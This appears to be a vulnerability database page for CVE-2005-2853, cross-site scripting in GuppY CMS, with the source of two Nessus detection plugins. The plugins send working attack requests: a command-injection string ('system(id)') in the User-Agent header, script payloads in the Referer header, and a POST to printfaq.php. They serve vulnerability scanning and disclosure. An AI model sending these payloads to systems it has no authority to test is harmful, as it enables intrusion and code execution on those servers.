Vulnerabilities > CVE-2005-2853 - Unspecified vulnerability in Guppy 4.5/4.5.3/4.5.3A

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
guppy
nessus
NVD
Published: 2005-09-08
Updated: 2024-11-21

Summary

Multiple cross-site scripting (XSS) vulnerabilities in GuppY 4.5.3a and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the pg parameter to printfaq.php, or the (2) Referer or (3) User-Agent HTTP headers, which are not properly handled by error.php.

Vulnerable Configurations

Part Description Count
Application
Guppy
3

Nessus

  • NASL familyCGI abuses : XSS
    NASL idGUPPY_REQUEST_HEADER_FLAWS.NASL
    descriptionThe remote host is running Guppy, a CMS written in PHP. The remote version of this software does not properly sanitize input to the Referer and User-Agent HTTP headers before using it in the
    last seen2020-06-01
    modified2020-06-02
    plugin id19943
    published2005-10-06
    reporter(C) 2005-2018 Josh Zlatin-Amishav
    sourcehttps://www.tenable.com/plugins/nessus/19943
    titleGuppy Multiple HTTP Header XSS
    code
    #
# Josh Zlatin-Amishav (josh at ramat dot cc)
# GPLv2
#

# Changes by Tenable:
# - Revised plugin title (4/30/09)
# - Fixed typo (5/21/14)

include("compat.inc");

if (description) {
  script_id(19943);
  script_version("1.20");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

  script_cve_id("CVE-2005-2853");
  script_bugtraq_id(14753);

  script_name(english:"Guppy Multiple HTTP Header XSS");
  script_summary(english:"Checks for request header injection vulnerabilities in Guppy");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows for
arbitrary code execution and cross-site scripting attacks.");
  script_set_attribute(attribute:"description", value:
"The remote host is running Guppy, a CMS written in PHP.

The remote version of this software does not properly sanitize input
to the Referer and User-Agent HTTP headers before using it in the
'error.php' script.  A malicious user can exploit this flaw to inject
arbitrary script and HTML code into a user's browser or, if PHP's
'magic_quotes_gpc' seting is disabled, PHP code to be executed on the
remote host subject to the privileges of the web server user id.");
  script_set_attribute(attribute:"see_also", value:"http://www.vupen.com/english/advisories/2005/1639");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Guppy version 4.5.4 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"plugin_publication_date", value:"2005/10/06");
  script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");
  script_copyright(english:"(C) 2005-2020 Josh Zlatin-Amishav");
  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("global_settings.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded:TRUE);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);

# A simple alert.
xss = "<script>alert(document.cookie);</script>";

# Loop through CGI directories.
foreach dir (cgi_dirs()) 
{
  # Try to exploit the flaw.
  req = string(
    "GET ", dir, "/error.php?err=404 HTTP/1.1\r\n",
    # nb: try to execute id.
    "User-Agent: ", '"; system(id);#', "\r\n",
    #     and try to inject some JavaScript.
    "Referer: ", xss, "\r\n",
    "Host: ", get_host_name(), "\r\n",
    "\r\n"
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

  # We need to follow the 302 redirection
  pat = "location: (.+)";
  matches = egrep(string:res, pattern:pat);
  if (matches) {
    foreach match (split(matches)) {
      match = chomp(match);
      url = eregmatch(string:match, pattern:pat);
      if (url == NULL) break;
      url = url[1];
      debug_print("url[", url, "]\n");
      break;
    }
  }

  if (url) {
    req = http_get(item:string(dir, "/", url), port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # Get results of id command.
    pat = "^(uid=[0-9]+.*gid=[0-9]+.*)";
    matches = egrep(string:res, pattern:pat);
    if (matches) {
      foreach match (split(matches)) {
        match = chomp(match);
        idres = eregmatch(string:match, pattern:pat);
        if (idres == NULL) break;
        idres = idres[1];
        debug_print("idres[", idres, "]\n");
        break;
      }
    }

    # Check for the results of the id command.
    if (idres)
    {
      report = string(
        "\n",
        "The following is the output received from the 'id' command:\n", 
        "\n",
        data_protection::sanitize_uid(output:idres),
        "\n"
      );

      security_warning(port:port, extra:report);
      set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
      exit(0);
    }
    # Check for XSS.
    else if (xss >< res && !get_kb_item("www/"+port+"/generic_xss"))
    {
      security_warning(port);
      set_kb_item(name:'www/'+port+'/XSS', value:TRUE);
      exit(0);
    }
  }
}
  • NASL familyCGI abuses
    NASL idGUPPY_DIRECTORY_TRAVERSAL.NASL
    descriptionThe remote host is running GuppY / EasyGuppY, a CMS written in PHP. The version of Guppy / EasyGuppY installed on the remote host fails to sanitize user-supplied input to the
    last seen2020-06-01
    modified2020-06-02
    plugin id19942
    published2005-10-06
    reporter(C) 2005-2018 Josh Zlatin-Amishav
    sourcehttps://www.tenable.com/plugins/nessus/19942
    titleGuppY < 4.5.6a Multiple Vulnerabilities
    code
    #
# Josh Zlatin-Amishav (josh at ramat dot cc)
# GPLv2
#

# Changes by Tenable:
# - Revised plugin title, added CVE ref, changed family (4/30/09)
# - Revised plugin description, added CPE (12/03/12)


include("compat.inc");

if (description) {
  script_id(19942);
  script_version("1.19");
  script_cve_id("CVE-2005-2853", "CVE-2005-3156");
  script_bugtraq_id(14752, 14984);

  script_name(english:"GuppY < 4.5.6a Multiple Vulnerabilities");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to cross-site
scripting and possibly directory traversal attacks." );
 script_set_attribute(attribute:"description", value:
"The remote host is running GuppY / EasyGuppY, a CMS written in PHP. 

The version of Guppy / EasyGuppY installed on the remote host fails to
sanitize user-supplied input to the 'pg' field in the 'printfaq.php'
script.  An attacker can exploit this flaw to launch cross-site
scripting and possibly directory traversal attacks against the affected
application." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Sep/359" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to version 4.5.6a or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

 script_set_attribute(attribute:"plugin_publication_date", value: "2005/10/06");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/09/06");

 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:guppy:guppy");
script_end_attributes();

 
  script_summary(english:"Checks for pg parameter flaw in Guppy");
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"(C) 2005-2020 Josh Zlatin-Amishav");
  script_dependencie("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");

port = get_http_port(default:80, embedded:TRUE);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);

# A simple alert.
xss = "<script>alert('" + SCRIPT_NAME + "');</script>";
# nb: the url-encoded version is what we need to pass in.
exss = urlencode(str:xss);

foreach dir ( cgi_dirs() )
{
  # Make sure the affected script exists.
  req = http_get(item:string(dir, "/printfaq.php?lng=en&pg=1"), port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If it does and looks like GuppY...
  if ("<title>GuppY - " >< res) {
    # Try to exploit the flaw.
    #
    # nb: we'll use a POST since 4.5.5 prevents GETs from working but
    #     still allows us to pass data via POSTs and cookies. Also, we
    #     check for the XSS rather than try to read an arbitrary file
    #     since the latter doesn't work with 4.5.5 except under Windows.
    postdata = string(
      'pg=', exss
    );
    req = string(
      "POST /", dir, "/printfaq.php HTTP/1.1\r\n",
      "Host: ", get_host_name(), "\r\n",
      "Content-Type: application/x-www-form-urlencoded\r\n",
      "Content-Length: ", strlen(postdata), "\r\n",
      "\r\n",
      postdata
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);
    
    if ( xss >< res )
    {
        security_warning(port);
	set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
        exit(0);
    }
  }
}

References